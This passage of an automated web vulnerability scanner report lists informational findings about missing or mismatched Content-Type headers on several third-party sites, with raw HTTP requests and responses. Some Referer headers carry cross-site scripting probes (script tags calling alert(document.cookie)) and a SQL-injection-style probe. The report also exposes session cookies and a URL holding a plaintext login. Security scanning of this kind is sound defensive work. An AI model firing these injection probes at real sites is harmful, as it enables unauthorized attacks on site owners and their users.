HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:39 GMT
Server: Apache
Last-Modified: Fri, 15 Oct 1999 15:26:33 GMT
ETag: "94c16c-210-15327c40"
Accept-Ranges: bytes
Content-Length: 528
Connection: close
Content-Type: text/plain

GIF89a&.&...............................ssscc.BBB1..1.c1cc11c!!!.............................................,....&.&.....0.di.h*.l..p..c..x...N...`H,.......@...tJ}
..fu..^....2&...q.\.2.k.Yn...e;..u.
...[SNIP]...

32.102. http://www.paperg.com/jsfb/embed.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /jsfb/embed.php?pid=3922&bid=2123 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:23:53 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 39271


var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL2123 = 'http://www.
...[SNIP]...

32.103. http://www.parenthood.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.parenthood.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain; charset=ISO-8859-1
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.parenthood.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=kjts65sdrlujvu865hot7asmh3; BIGipServerwww_parenthood.com_http_pool=440556810.20480.0000; __utmz=199637295.1295922194.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/57; __utma=199637295.1708456418.1295922194.1295922194.1295922194.1; __utmc=199637295; __utmb=199637295.1.10.1295922194; s_cc=true; s_evar1=Data%20Not%20Available; s_evar2=Data%20Not%20Available; s_evar3=Data%20Not%20Available; s_lastvisit=1295922193827; s_sq=%5B%5BB%5D%5D; AxData=; Axxd=1; __qca=P0-1852484828-1295922223335

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:17:54 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 05 Feb 2003 15:05:58 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: public
Expires: Thu, 15 May 2010 20:00:00 GMT
Content-Type: text/plain; charset=ISO-8859-1
Content-Length: 1466

......................(.......&................................F.......\.......a...R...............e.......5.......................f...|...|...t...G...g...2...........K...............8...............e
...[SNIP]...

32.104. http://www.soundingsonline.com/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /

Issue detail

The response contains the following Content-type statement:
  • Content-type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET / HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:30:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-type: text/html

<br />
<b>Fatal error</b>: Maximum execution time of 30 seconds exceeded in <b>E:\Inetpub\SoundingsOnline\libraries\joomla\database\database\mysql.php</b> on line <b>221</b><br />

32.105. http://www.traderonline.com/css/promoCSS.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.traderonline.com
Path:   /css/promoCSS.php

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /css/promoCSS.php HTTP/1.1
Host: www.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:26:57 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 5249


/***********************
   PROMOS
***********************/
.smlPromo3 {width: 249px; height: 293px;border: solid 1px #a2a2a2;background: url('http://tolimages.traderonline.com/img/tol-designtol/gradi
...[SNIP]...

32.106. http://www.traderonline.com/css/tolhomecss.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.traderonline.com
Path:   /css/tolhomecss.php

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /css/tolhomecss.php HTTP/1.1
Host: www.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8009oaoAAx1V; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; s_pers=%20s_nr%3D1295884785350%7C1298476785350%3B%20s_lv%3D1295884785352%7C1390492785352%3B%20s_lv_s%3DFirst%2520Visit%7C1295886585352%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.2.10.1295884751

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9341

/******************
INDEX
*******************/
#idxTop{float:left;width:399px;margin-bottom:0;}
#idxBot{float:left;width:556px;border-left:2px #a2a2a2 solid;margin-bottom:0;}
#tileLftTp,#tileRtT
...[SNIP]...

32.107. http://www.traderonline.com/javascript/master_s_code.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.traderonline.com
Path:   /javascript/master_s_code.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/master_s_code.js HTTP/1.1
Host: www.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:32 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 32369

/**************************
flicker
***************************/
try {
document.execCommand('BackgroundImageCache', false, true);
} catch(e) {}


function tourWndw() {
    var imtTour=wind
...[SNIP]...

32.108. http://www.traderonline.com/javascript/realmedia.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.traderonline.com
Path:   /javascript/realmedia.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/realmedia.js HTTP/1.1
Host: www.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:34 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 2566


   // Instantiate the real media variables
   var oas='http://ads.traderonline.com/RealMedia/ads/';
   var RN = new String (Math.random());
   var RNS = RN.substring (2,11);
   var _version = 40;

   // Functio
...[SNIP]...

32.109. http://www.vox.com/.shared/css/base.css

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.vox.com
Path:   /.shared/css/base.css

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /.shared/css/base.css HTTP/1.1
Host: www.vox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Perlbal
Keep-Alive: timeout=30, max=100
Content-Length: 39
Date: Tue, 25 Jan 2011 04:39:49 GMT
X-Varnish: 2314529917
Age: 0
Via: 1.1 varnish
Connection: close

<h1>404 - Not Found</h1>
File not found

32.110. http://www.w3.org/1999/02/22-rdf-syntax-ns

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.w3.org
Path:   /1999/02/22-rdf-syntax-ns

Issue detail

The response contains the following Content-type statement:
  • Content-Type: application/rdf+xml
The response states that it contains XML. However, it actually appears to contain plain text.

Request

GET /1999/02/22-rdf-syntax-ns HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:40:05 GMT
Server: Apache/2
Last-Modified: Thu, 30 Dec 2010 06:21:52 GMT
ETag: "1b92-4989ab3934000"
Accept-Ranges: bytes
Content-Length: 7058
Cache-Control: max-age=21600
Expires: Tue, 25 Jan 2011 10:40:05 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: application/rdf+xml

<rdf:RDF
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:rdfs="http://www.w3.org/2000/01/rdf-schema#"
xmlns:owl="http://www.w3.org/2002/07/owl#"
xmlns:dc="http://purl.org/dc
...[SNIP]...

32.111. http://www.w3.org/TR/html4/strict.dtd

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.w3.org
Path:   /TR/html4/strict.dtd

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /TR/html4/strict.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:19 GMT
Server: Apache/2
Content-Location: strict.dtd.raw
Vary: negotiate,accept-encoding,User-Agent
TCN: choice
Last-Modified: Fri, 24 Dec 1999 23:37:48 GMT
ETag: "8720-35c741aef8b00;475d1b7cb20c0"
Accept-Ranges: bytes
Content-Length: 34592
Cache-Control: max-age=7776000
Expires: Mon, 25 Apr 2011 00:11:19 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

<!--
This is HTML 4.01 Strict DTD, which excludes the presentation
attributes and elements that W3C expects to phase out as
support for style sheets matures. Authors should use the Stric
...[SNIP]...

32.112. http://www1.whdh.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain; charset=ISO-8859-1
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www1.whdh.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; __utmc=208585492; __utmb=208585492.1.10.1295906131; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; ACC1TAB=1

Response

HTTP/1.1 200 OK
Date: Sun, 23 Jan 2011 02:59:18 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Type: text/plain; charset=ISO-8859-1
Last-Modified: Fri, 04 Apr 2008 13:53:10 GMT
ETag: "224114-9be-703dbd80"
Accept-Ranges: bytes
Age: 154549
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Sun, 30 Jan 2011 02:59:18 GMT
Cache-Control: max-age=604800
Via: 1.1 dfw107010 (MII-APC/1.6)
Content-Length: 2494

...... ..............(... ...@.................................s...{...........................s...{.................!!..!!..))..))..))..))..11..11..11..99..99..BB..BB..BB..JJ..JJ..JJ..RR..RR..ZZ..c.
...[SNIP]...

32.113. http://www1.whdh.com/includes/elements/accordion_whdh-links

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /includes/elements/accordion_whdh-links

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html; charset=ISO-8859-1
The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /includes/elements/accordion_whdh-links HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:27 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: accordion_whdh-links.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:58:16 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close
Content-Length: 1489

<ul class='list' style="margin:10px;"><li><a href="http://12.27.100.145/cgi-bin/Xebra?logon&userid=autism&password=speaks">Autism Speaks New England Chapter </a></li>
<li><a href="http://www1.whdh.co
...[SNIP]...

32.114. http://www1.whdh.com/js/sunbeam09.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /js/sunbeam09.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html; charset=ISO-8859-1
The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/sunbeam09.js?20100903 HTTP/1.1
Host: www1.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:53:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: sunbeam09.js.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=2592000
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Wed, 23 Feb 2011 21:53:01 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107010 (MII-APC/1.6)
Content-Length: 12633


function EmailNewsteam(anId)
{
var url = "/newsteam/email_newsteam.php?id="+anId;
var popupWin = window.open(url, "emailnewsteam", "status,width=420,height=560,screenx=5,screeny=5,left=5,top
...[SNIP]...

32.115. http://www3.whdh.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www3.whdh.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain; charset=ISO-8859-1
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www3.whdh.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=c8e7165f6bccdedcb43d58e60027d58c; PHPSESSID=3198023387448ce0f3267c57086618b1; __utmz=208053012.1295920517.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/48; __utma=208053012.1206922820.1295920517.1295920517.1295920517.1; __utmc=208053012; __utmb=208053012.1.10.1295920517

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:54:27 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Fri, 04 Apr 2008 13:53:10 GMT
ETag: "224114-9be-703dbd80"
Accept-Ranges: bytes
Content-Length: 2494
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

...... ..............(... ...@.................................s...{...........................s...{.................!!..!!..))..))..))..))..11..11..11..99..99..BB..BB..BB..JJ..JJ..JJ..RR..RR..ZZ..c.
...[SNIP]...

33. Content type is not specified
There are 3 instances of this issue:

Issue description

If a web response does not specify a content type, the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results and, if the content contains any user-controllable data, may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


33.1. http://click.linksynergy.com/fs-bin/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://click.linksynergy.com
Path:   /fs-bin/click

Request

GET /fs-bin/click HTTP/1.1
Host: click.linksynergy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Length: 190
Date: Mon, 24 Jan 2011 15:01:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Error</title></head><body>
Missing offer id cookie
</body></html>

33.2. http://www.assoc-amazon.com/s/ads-common.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.assoc-amazon.com
Path:   /s/ads-common.js

Request

GET /s/ads-common.js HTTP/1.1
Host: www.assoc-amazon.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response


// Color library

// RGB object
function AmazonRGB(red, green, blue)
{
// These are integers between 0 and 255 inclusive.
this.r = red;
this.g = green;
this.b = blue;
}

// Accessor methods for the RGB
...[SNIP]...

33.3. http://www.aucegypt.edu/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aucegypt.edu
Path:   /x22

Request

GET /x22 HTTP/1.1
Host: www.aucegypt.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NOT FOUND
Cache-Control: private,max-age=0
Content-Length: 13
Server: Microsoft-IIS/7.5
Exires: Sun, 09 Jan 2011 16:02:19 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 16:02:18 GMT
Connection: close

404 NOT FOUND
